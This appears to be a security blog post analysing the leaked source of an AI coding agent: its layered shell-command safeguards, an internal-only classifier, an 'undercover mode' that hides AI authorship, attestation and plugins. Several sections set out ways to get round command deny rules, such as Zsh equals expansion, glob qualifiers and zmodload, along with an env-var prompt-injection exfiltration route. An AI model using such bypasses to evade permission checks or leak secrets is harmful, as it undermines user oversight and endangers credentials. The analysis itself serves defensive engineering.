Inside the Machine: What a Leaked Agentic Code Tool Reveals About AI Security

In March 2026, someone extracted the complete source code of Claude Code from an npm package and published it to GitHub. No modifications. No commentary. Excluding generated code, lock files, and test fixtures — roughly 512,000 lines of TypeScript, dumped into a repository with a single commit.

How this happened is itself a security lesson. Anthropic published version 2.1.88 of their npm package with a production source map file — cli.js.map, weighing in at 59.8 MB — that contained the original TypeScript source, comments and all. A misconfigured .npmignore or a build pipeline that skipped artifact scanning, depending on who you ask. The file was there for anyone to extract. Security researcher Chaofan Shou was the first to notice.

According to multiple reports on Reddit and Hacker News, the source map itself was generated during Claude Code’s build process — a build process that, in all likelihood, was run by Claude. A tool built to hide its own fingerprints in public repositories, exposed by an artifact its own build pipeline created. There’s a meta-irony there that I’ll come back to.

Anthropic didn’t intend for anyone outside their walls to read this code. But it’s publicly available now — published to GitHub, mirrored dozens of times, and discussed on Hacker News, Reddit, and Chinese tech media. No credentials or customer data were exposed. I’m analyzing it as publicly available information, for research and educational purposes, the same way security researchers analyze any leaked codebase. What’s inside tells you more about the state of AI security than any whitepaper or conference talk I’ve seen.

I spent a day reading through this codebase. What I found was not a simple CLI wrapper around an API. It was a security architecture built to solve a problem that most of the industry is still catching up to: what happens when you give a language model shell access?

The Fundamental Problem

Here’s the thing about AI coding assistants. The useful ones don’t just suggest code. They execute it. They run npm install. They edit files. They grep through your codebase. They do the things you’d do yourself in a terminal.

This means the people who build these tools have to solve a security problem that doesn’t have a clean solution. You need to give an AI enough access to be useful, but not so much that it can destroy your machine, exfiltrate your secrets, or silently compromise your build pipeline.

Claude Code approaches this with a level of sophistication that surprised me. And in one critical respect, with a level of caution that should concern everyone who uses it.

Eight Layers of Bash Security

The bash execution path in Claude Code has eight distinct security layers — by my reading of the source. Let that sink in. Eight. For running shell commands.

Here’s what they are, in order:

First, user-defined permission rules. You can say “always allow npm test” or “never allow rm -rf”. Wildcards supported. This is the layer users see and configure.

Second, a classifier — but only if you work at the company. More on this in a moment.

Third, TreeSitter-based AST analysis. The tool actually parses your bash command into an abstract syntax tree before running it. This isn’t regex matching. It’s structural analysis of the command’s grammar.

Fourth, pattern matching for dangerous constructs. Command substitutions, heredoc injections, process substitutions. The things that make bash a Turing-complete footgun.

Fifth, semantic analysis. Is this command destructive or read-only? The tool tries to figure out what a command does, not just what it says.

Sixth, path validation. Working directory checks. Traversal prevention. Making sure the command runs where you think it does.

Seventh, sandbox isolation. A dedicated sandbox runtime restricts filesystem access and network connections at the syscall level.

Eighth, mode validation. In “plan mode,” everything is read-only. Write operations are blocked entirely.

This is defense in depth done seriously. If any one layer fails — and they all can — the others might still catch it. I’ve spent years in application security, and I can tell you that most companies don’t get past layer two.

And then there’s PowerShell.

Claude Code doesn’t just handle bash and zsh. It also has a separate security pipeline for PowerShell — roughly 1,090 lines of dedicated code. The same structural rigor: AST analysis, semantic classification, pattern matching. All of it, replicated for a second shell language. I haven’t seen any other AI coding assistant that even attempts this. Most don’t support PowerShell at all. The ones that do pass commands straight through.

But there’s a problem with this architecture. A big one.

The ANT-ONLY Gap

The second layer I mentioned — the classifier — doesn’t exist in the public version of Claude Code.

Here’s what I mean. The codebase has a file called bashClassifier.ts. In the internal build — the one Anthropic’s own engineers use — this file contains an LLM-based classifier that makes a separate API call to evaluate whether a bash command is safe. It reads the command, understands the user’s intent, and makes a nuanced judgment that no rule-based system can match.

In the public build, that file is a stub. It returns “disabled.” Always.

This works because Claude Code uses Bun’s feature() function for compile-time dead code elimination. When the build system compiles the public version, the real classifier code is simply not included. It’s not obfuscated. It’s not hidden behind a runtime check. It’s gone. The JavaScript runtime never sees it.

The public version ships with rule-based permission checking only. Pattern matching, AST analysis, sandbox — yes. But the thing that would actually understand context? That’s internal only.

The effect is an asymmetry worth scrutinizing: Anthropic’s internal users appear to get an additional safety layer that external users do not. The developers who pay for API access — who trust the company’s brand — get a security model that lacks intent-aware evaluation.

Now, the counterargument is strong, and it’s worth laying out fully. Using an LLM to validate an LLM-generated command creates a circular trust problem: you need the model to be safe enough to call the model that makes it safe. There’s also the latency cost of an extra API call on every command, and the financial cost at Anthropic’s scale. These aren’t minor concerns. They’re legitimate engineering tradeoffs.

But the effect remains: Anthropic’s internal users have a security tool that understands intent, while everyone else has one that only understands syntax. That’s a meaningful difference. When someone types curl payload.sh | bash, a rule-based system can flag curl and bash. An intent-aware system can understand that piping a remote script into a shell is almost always a bad idea, regardless of the specific commands involved.

The honest framing is this: Anthropic appears to have decided that the circular trust problem is acceptable internally — where they control the model, the latency budget, and the blast radius — but not acceptable externally, where all three are unknowns. Whether that’s the right call depends on your threat model. But the asymmetry exists, and users should know about it.

Undercover Mode

There’s another internal-only feature that I found particularly revealing. The codebase contains an “undercover mode” — a system designed to prevent Claude Code from leaking internal information when it contributes to public repositories.

When undercover mode is active, the tool injects instructions into its own system prompt: never mention internal model codenames, unreleased version numbers, internal project names, Slack channels, or even the phrase “Claude Code” in commit messages or pull request descriptions.

The blacklist includes things like opus-4-7 and sonnet-4-8 — model versions that, as far as I know, hadn’t been announced publicly at the time of the leak. And animal codenames: Capybara, Tengu. Whether these are real internal model names or placeholders, their presence in the blacklist is itself a data point.

The system has no force-off switch. It defaults to on unless the tool can positively confirm it’s operating in an internal repository. This is gated by the same USER_TYPE flag that controls the classifier gap — ant-only, compiled out of public builds.

I find this fascinating because of the inversion it represents. Most AI coding assistants add attribution. They’ll tell you “this was generated by AI” or include a co-authored-by line. Claude Code does the opposite. It actively tries to hide that an AI was involved at all.

From a security engineering perspective, this makes sense. If you’re using an AI tool on open-source work and you don’t want to signal your toolchain to competitors, undercover mode is exactly what you’d build. But it also raises a question: how many public repositories have commits written by Claude Code that nobody knows were AI-generated?

Dead Code Elimination as a Security Boundary

The mechanism behind the classifier gap is actually one of the most interesting architectural decisions in the codebase.

There are over 90 feature flags — identified by grepping for feature() calls — controlling what gets included in each build. Some are simple toggles — turn on voice mode, turn off telemetry. But others are structural. The COORDINATOR_MODE flag, for example, controls whether the entire multi-agent coordination subsystem is compiled into the binary. Not enabled or disabled at runtime. Compiled in or compiled out.

The code uses feature() from Bun’s bundle module, which works at compile time. If a flag is false, the code inside that branch is eliminated from the output entirely. The resulting JavaScript file literally does not contain those functions.

const coordinatorModule = feature('COORDINATOR_MODE')
  ? require('./coordinator/coordinatorMode.js')
  : null

If COORDINATOR_MODE is false, the bundler sees null and strips the entire require. No dead code. No stub functions. No strings to grep for. Just gone.

This is clever. It means the public build can’t leak internal features through accidental exposure, because the features don’t exist in the public build. You can’t find a hidden flag or a secret API endpoint if the code that implements it was never compiled.

But it’s also a single point of failure. The entire security boundary between internal and external builds rests on the build system correctly evaluating these feature flags. If the build configuration is wrong — if one flag is accidentally flipped — internal code ships to the public.

And there are a lot of flags. Some control features you’d expect: voice mode, web browser tool, enhanced planning. Others are more opaque. TORCH. LODESTONE. BUDDY. Codenames for projects that may never ship publicly.

The feature flag system is doing double duty: it’s both a product management tool and a security boundary. That’s efficient, but it means a product decision can inadvertently affect security, and a security review needs to understand every product flag.

Runtime Attestation

The most extreme expression of this philosophy deserves its own section.

Claude Code implements a NATIVE_CLIENT_ATTESTATION system. When enabled, the tool embeds a placeholder string — cch=00000 — into every API request. Before the request leaves the machine, Bun’s HTTP stack — written in Zig, not JavaScript — overwrites those zeros with a computed cryptographic hash. Same-length replacement, no Content-Length change. The server can then verify that the request genuinely came from an unmodified Claude Code binary.

This isn’t application-level attestation. It’s runtime-level attestation. The thing verifying the client’s identity isn’t the application code — it’s the runtime itself. To my knowledge, no other AI coding assistant does anything like this. It’s the kind of technique you see in DRM systems and anti-cheat software, not developer tools.

The implementation lives in bun-anthropic/src/http/Attestation.zig — Zig code that the JavaScript layer cannot inspect or modify. The attestation token is computed from request-specific data and embedded in the HTTP body, not in a header where it could be stripped.

Whether you find this reassuring or unsettling probably depends on how you feel about Anthropic knowing, with high confidence, that you’re using their exact binary and not a fork or wrapper. It’s a defensible choice for a company trying to prevent API abuse. But it also means the tool phones home with a cryptographic proof of its own identity on every request — a capability that, in a different regulatory environment, could become a compliance concern.

The Zsh Problem

One of the things that struck me most was how much effort goes into handling Zsh.

Most people think of “shell security” as a bash problem. You write some regex patterns, you check for dangerous flags on common commands, and you move on. Claude Code does not do that.

There’s extensive handling of Zsh-specific attack surfaces that I doubt most developers even know exist.

Take equals expansion. In Zsh, =curl is equivalent to the full path of the curl binary. This means a deny rule like deny: Bash(curl:*) can be bypassed by writing =curl instead. The tool explicitly blocks this.

Or glob qualifiers. Zsh lets you write things like *(e:'command':) to execute arbitrary code during filename expansion. You can embed command execution inside what looks like a simple file glob. The tool detects and blocks this pattern.

Or Zsh’s module system. zmodload can load modules that provide direct filesystem access (mapfile), network sockets (net/tcp), process spawning (zpty), and more. Each of these is explicitly blocked.

Or Zsh’s always blocks, which guarantee code execution even if the surrounding command fails. Useful for cleanup, terrible for security.

Or Zsh parameter expansion with ~[, which can trigger arbitrary command execution through a mechanism most Zsh users don’t even know about.

The reason this matters is that shell security is fundamentally harder than people think. Shells are not simple command interpreters. They are programming languages with multiple evaluation stages, implicit behavior, and decades of accumulated features. Zsh is particularly rich in footguns.

When you give an AI shell access, you’re not just giving it the ability to run commands. You’re giving it access to a language with its own Turing-complete capabilities, its own evaluation model, and its own attack surface. Claude Code’s security team clearly understands this. The ~5,200 lines of bash security code — plus the separate TreeSitter parser at roughly 4,400 lines — reflect that understanding. (Line counts via wc -l on the relevant source directories, excluding tests.)

But here’s the uncomfortable truth: they’re playing whack-a-mole. Every shell feature they block is one they know about. The ones they haven’t found yet are still there.

The Environment Variable Problem

There’s another attack surface that most shell security systems ignore, and Claude Code does not: environment variables.

Here’s the problem. When an AI agent runs a bash command, the shell expands environment variables before execution. If a malicious file contains ${ANTHROPIC_API_KEY}, and that variable exists in the process environment, the shell will happily substitute the actual key value into the command. The agent didn’t ask for the key. The user didn’t type it. But it gets exfiltrated anyway, embedded in whatever command the shell ends up executing.

This isn’t theoretical. It’s a prompt injection vector: trick the AI into running a command that happens to contain an env var reference, and the shell does the rest.

Claude Code addresses this directly. When running in GitHub Actions — an environment where the AI might be processing untrusted repository content — it scrubs over 30 sensitive environment variables from child processes before executing them. API keys. Cloud credentials. OIDC tokens. SSH signing keys. Even GitHub Actions’ own ACTIONS_RUNTIME_TOKEN, which could enable cache poisoning and supply-chain attacks.

The list is explicitly maintained. GITHUB_TOKEN is intentionally not scrubbed, because wrapper scripts need it. Everything else is stripped.

Anti-Distillation and the Arms Race

There’s a feature flag in this codebase called ANTI_DISTILLATION_CC.

I want to talk about what that might mean — and be clear about what I can and can’t verify from the source alone.

Distillation, in the ML context, is the practice of using a large model to train a smaller one. You feed the large model inputs, collect its outputs, and use those input-output pairs as training data for a smaller, cheaper model that approximates the large one’s behavior.

From a company’s perspective, this is a problem. If you’ve spent hundreds of millions of dollars training a model, and your users can extract its capabilities by querying it systematically and using the responses to train a competitor, that’s a direct threat to your business.

So companies build defenses. Rate limiting is the obvious one. But there are more subtle approaches: watermarking outputs, perturbing responses in ways that are invisible to humans but poison distillation training, detecting systematic query patterns that suggest extraction attempts.

The ANTI_DISTILLATION_CC flag suggests Claude Code at least intends to include some or all of these measures. The _CC suffix indicates it’s specific to this product, not a general platform feature.

But I want to be honest about the limits of what I can determine from static code analysis alone. The presence of this flag tells me Anthropic is concerned about model extraction. It does not, by itself, prove which specific defenses are implemented behind it. The code controlled by this flag could be a single rate-limiting check, a comprehensive output perturbation system, or something in between. Without a running instance and the ability to observe its behavior, I can only speculate about the implementation.

Still, the existence of this flag is revealing in itself. It tells us that one of the leading AI companies considers distillation a sufficiently serious threat to bake defenses directly into their client-side code — not just on the server side. That’s a design choice worth thinking about.

What I find genuinely interesting from a security perspective is the adversarial relationship it represents. The tool is defending, at least in part, against its own users. Not against malicious actors trying to compromise the system, but against legitimate users trying to extract value from it in ways the company doesn’t want.

This is different from traditional security. In traditional security, you have a clear threat model: attackers, malware, unauthorized access. The defense is aligned with the user’s interests. Here, the defense is aligned with the company’s interests, and potentially opposed to the user’s interests.

I’m not making a normative claim about whether this is right or wrong. Companies protect their intellectual property. That’s normal. But it’s worth recognizing that “anti-distillation” features exist in a gray area between security, DRM, and competitive moat-building. And the technical approaches — output perturbation, behavioral detection — are essentially the same techniques used in adversarial ML.

Whether or not the specific defenses behind this flag are aggressive or minimal, the fact that the flag exists tells us something about where the industry is heading. The arms race here will be fascinating to watch.

Plugins: The Eternal Tension

The plugin system comprises roughly 50 files — more than the bash security layer.

There’s a marketplace manager that supports URL-based, GitHub-based, and local marketplaces. A dependency resolver. Automatic updates. A security blocklist. Organization-level plugin policies. OAuth-based plugin authentication.

This is a fully-fledged extension platform. And it represents the oldest tension in software security: extensibility versus control.

Plugins, by definition, run code that the core team didn’t write and can’t fully vet. A plugin can define custom slash commands, custom agents, custom hooks, and MCP servers. It can modify the tool’s behavior in ways the core security model doesn’t account for.

Claude Code has mitigations. There’s a blocklist. There’s a flagging system. There’s organization policy control. But the fundamental problem remains: if you let users install arbitrary code, they will install arbitrary code. Some of it will be malicious. Some of it will be incompetent. The security model can make this harder, but it can’t make it impossible.

What makes this particularly relevant for AI coding assistants is the asymmetry of trust. When you install a VS Code extension, you’re trusting the extension with your editor. When you install a plugin for an AI coding assistant, you’re trusting it with an agent that has shell access, file system access, and the ability to make API calls on your behalf.

The blast radius is different.

I noticed that the plugin system has a concept of “inline plugins” — plugins defined directly in configuration rather than installed from a marketplace. This is convenient for developers. It’s also a convenient way to inject malicious behavior without going through any review process.

How Others Handle This

To put all of this in context, I looked at how the three most prominent open-source AI coding assistants approach the same fundamental problem. Codebases examined on March 31, 2026 — these tools update frequently, so specifics may have changed since.

Aider takes the minimalist path. Commands go through Python’s subprocess.Popen with shell=True. No permission system. No sandbox. No AST analysis. The entire security model is: the user approves each command, and hopefully the user knows what they’re approving. For a research project or personal tool, this is fine. For anything touching production infrastructure, it isn’t.

Cline adds a permission layer. It asks the user before executing commands and maintains a simple allowlist. But the permission check is string-based — it matches command text, not intent. There’s no structural analysis of what the command actually does. A carefully crafted command can look benign to a string matcher while doing something entirely different.

opencode goes further with a banned command list — specific commands and flags that are blocked entirely. But it’s still pattern matching. A cleverly constructed command can bypass any fixed list of banned strings.

None of them have compile-time security boundaries. None of them scrub environment variables from subprocesses. None of them parse shell commands into abstract syntax trees. None of them have anti-distillation features. None of them try to hide their own involvement in public repositories.

This isn’t a criticism. These are open-source projects built by small teams, and they’ve made reasonable tradeoffs for their context. But the gap between what they do and what Claude Code does illustrates something important: the security engineering required to give an AI shell access at production scale is enormous. Most teams aren’t doing it.

What Builders Can Learn

If you’re building an AI agent system — whether it’s a coding assistant, a data pipeline, or anything else that executes actions on behalf of users — here’s what this codebase teaches.

Layer your defenses, and make them independent. The eight-layer bash security model works because each layer uses a different approach. AST parsing catches things that pattern matching misses. Sandbox isolation catches things that semantic analysis misses. When layers are independent, one failure doesn’t cascade.

Understand your execution environment deeply. The Zsh handling shows what happens when security engineers really understand the environment they’re securing. Shells aren’t simple. Browsers aren’t simple. File systems aren’t simple. If you’re giving an agent access to any of these, you need engineers who understand the attack surface at a deep level, not just a surface level.

Compile-time elimination is stronger than runtime hiding — when it fits your threat model. The feature flag approach — actually removing code from the build rather than hiding it behind a runtime check — is harder to bypass. You can’t reverse-engineer what isn’t there. If you have features that should never be accessible to certain users, don’t ship them and check a flag. Don’t ship them at all. This isn’t universally applicable — runtime controls still have their place — but for secrets you genuinely never want exposed, compile-time elimination is the stronger choice.

Beware the internal-external gap. If your internal users get different security than your external users, you need to be honest about that — and have a plan to close the gap. The rule-based system in Claude Code is good. But Anthropic’s choice to use an LLM-based classifier internally suggests they consider intent-aware checking valuable — or at least acceptable within the latency, cost, and risk parameters of an internal deployment. Whether that means it’s “better” in general is a tradeoff they’ve apparently decided differently for external users.

Plugins are the hard problem. Every platform that allows extensions eventually faces this. The more powerful your agent, the more dangerous a malicious plugin becomes. Have a threat model for plugins before you ship a plugin system. Not after.

Task IDs need to be unguessable. This seems minor, but I loved the detail about task IDs. They use 8 random bytes from a cryptographic random number generator, mapped to a 36-character alphabet, giving roughly 2.8 trillion possible IDs. The comment in the code says this is “sufficient to resist brute-force symlink attacks.” That’s the right way to think about it. Every identifier that an attacker could influence is a potential attack vector.

Sandbox, but don’t trust your sandbox. Claude Code has a dedicated sandbox runtime. It also has seven other security layers. That’s the right instinct. Sandboxes are strong defenses, but they have bugs. Escape vulnerabilities get discovered. Layer your defenses so that a sandbox escape doesn’t mean total compromise.

The Bigger Picture

What this codebase really shows is how early we are in the AI security journey.

Roughly 512,000 lines of code to build a CLI tool that helps developers write code. Eight layers of bash security. A separate PowerShell pipeline. A runtime-level attestation system embedded in Zig. An undercover mode that hides its own fingerprints from public repositories. Over 90 feature flags to manage the complexity. Environment variable scrubbing for 30+ secrets. Around 50 files of plugin infrastructure.

This is an enormous amount of engineering dedicated to a problem that, two years ago, barely existed. And it’s still not enough. The classifier gap suggests Anthropic knows their public security model is weaker than it could be. The Zsh handling reveals that shell security is an ongoing cat-and-mouse game. The anti-distillation flag points to an adversarial dynamic between AI companies and their users that is real and growing. The undercover mode suggests they’re worried about signaling — about what happens when the world finds out how much AI-generated code is already in production.

And then there’s the leak itself. A tool with an undercover mode designed to prevent fingerprint exposure in public repositories, whose build pipeline — reportedly powered by the same AI — generated a 59.8 MB source map that exposed the entire codebase. If even Anthropic, with the most sophisticated agent security architecture I’ve seen, can be undone by a misconfigured build artifact, what does “good enough” look like for everyone else?

I looked at the open-source alternatives. Aider doesn’t sandbox. Cline doesn’t parse. opencode doesn’t scrub. The gap isn’t about talent or intention — it’s about the sheer volume of defensive engineering required when you give a language model shell access and decide to take the threat seriously.

We’re building systems that have more agency than any software we’ve ever deployed. They can read files, write files, execute commands, make network requests, install packages, and spawn subprocesses. They do this in service of goals that are expressed in natural language — goals that are inherently ambiguous and open to manipulation.

The security challenge isn’t preventing unauthorized access. It’s defining what authorized access means when the authorized user is a language model interpreting a human’s intent.

I don’t think anyone has solved this yet. Claude Code represents one of the most serious attempts I’ve seen. It’s thoughtful, layered, and built by people who clearly understand both the power and the danger of what they’re building.

But the internal-external gap remains. The whack-a-mole continues. The arms race is just getting started. And the question that nobody has answered yet is: if the company taking agent security most seriously still ships a weaker model to its paying customers than to its own engineers — what is the baseline we should expect from everyone else?

The Fundamental Problem#

Eight Layers of Bash Security#

The ANT-ONLY Gap#

Undercover Mode#

Dead Code Elimination as a Security Boundary#

Runtime Attestation#

The Zsh Problem#

The Environment Variable Problem#

Anti-Distillation and the Arms Race#

Plugins: The Eternal Tension#

How Others Handle This#

What Builders Can Learn#

The Bigger Picture#